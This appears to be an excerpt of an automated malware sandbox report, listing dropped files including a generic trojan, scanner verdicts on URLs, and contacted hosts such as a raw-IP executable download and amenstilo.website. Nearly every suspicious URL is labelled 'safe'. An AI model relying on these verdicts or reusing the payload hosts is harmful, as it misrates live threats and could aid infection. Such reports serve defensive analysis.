C:\Windows\Temp\AppsLo.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\Trombone.dll	4%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\js3250.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldap32v50.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldappr32v50.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nspr4.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nss3.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plc4.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plds4.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\smime3.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\softokn3.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\ssl3.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_compat.dll	0%	ReversingLabs
C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_core.dll	4%	ReversingLabs
C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	12%	ReversingLabs

Source	Detection	Scanner	Label
http://home.netscape.com/NC-rdf#alwaysAsk	0%	Avira URL Cloud	safe
https://amenstilo.website:443llt	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#persist	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SpecialFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleSMTP	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag	0%	Avira URL Cloud	safe
https://download.binance.com	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#StatusText	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/Tom.exe	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanGetIncomingMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Synchronize	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#EmptyTrash	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting	0%	Avira URL Cloud	safe
https://download.binance.com/electron-desktop/windows/production/binance-setup.exe	0%	Avira URL Cloud	safe
https://amenstilo.website/po	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanSubscribe	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SupportsFilters	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Server	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#TotalUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsDeferred	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#MarkAllMessagesRead	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#description	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Content-Length	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#attribute	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Move	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CopyFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#HasUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SyncDisabled	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleDiskSpace	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DirName	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DirTreeNameSort	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitle	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne	0%	Avira URL Cloud	safe
https://amenstilo.website/	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanRename	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#fileExtensions	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanSearchMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#LeafName	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleMain	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Identity	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Rename	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Virtual	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanFileMessagesOnServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Subscribable	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Transferred	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DirUri	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SupportsOffline	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsSessionDefaultServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Modify.descriptionldap_2.servers.pab.descriptionabook.mab%s%s.mabcon	0%	Avira URL Cloud	safe
https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2Fsj	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Delete	0%	Avira URL Cloud	safe
http://wpad/wpad.datnetwork.proxy.autoconfig_urlnetwork.proxy.no_proxies_onnetwork.proxy.failover_ti	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#BookmarkSeparator	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsRemote	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTag	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#MoveFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DateStarted	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#prettyName	0%	Avira URL Cloud	safe
http://www.netscape.com/newsref/std/cookie_spec.html	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#KeyIndex	0%	Avira URL Cloud	safe
https://amenstilo.website/To	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#saveToDisk	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#RedirectorType	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#FolderTreeName?sort=true	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#ProgressPercent	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#File	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Settingsmsgaccounts:/http://home.netscape.com/NC-rdf#PageTitleFakeAc	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsDirectory	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#FileSystemObject	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#child	0%	Avira URL Cloud	safe
https://amenstilo.website/4o	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#useSystemDefault	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Key	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Copy	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CharsetDetector	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#TotalMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#extension	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
download.binance.com	52.222.214.90	true	false		unknown
amenstilo.website	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/Tom.exe	false	Avira URL Cloud: safe	unknown
https://download.binance.com/electron-desktop/windows/production/binance-setup.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://home.netscape.com/NC-rdf#StatusText	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0	thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://amenstilo.website:443llt	Qjsync.exe, 00000011.00000003.3017950213.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3018198100.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3013672743.000000000062F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#persist	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452498639.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleSMTP	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#alwaysAsk	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://download.binance.com	MiJZ3z4t5K.exe, 00000000.00000002.3344787379.000000000319F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SpecialFolder	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanGetIncomingMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Synchronize	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#EmptyTrash	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/po	Qjsync.exe, 00000011.00000003.3013672743.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SupportsFilters	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MiJZ3z4t5K.exe, 00000000.00000002.3344787379.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2119626367.00000000043F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CanSubscribe	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#TotalUnreadMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Server	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsDeferred	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#MarkAllMessagesRead	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#description	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#attribute	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Move	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Content-Length	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CopyFolder	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#SyncDisabled	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#HasUnreadMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleDiskSpace	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DirName	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
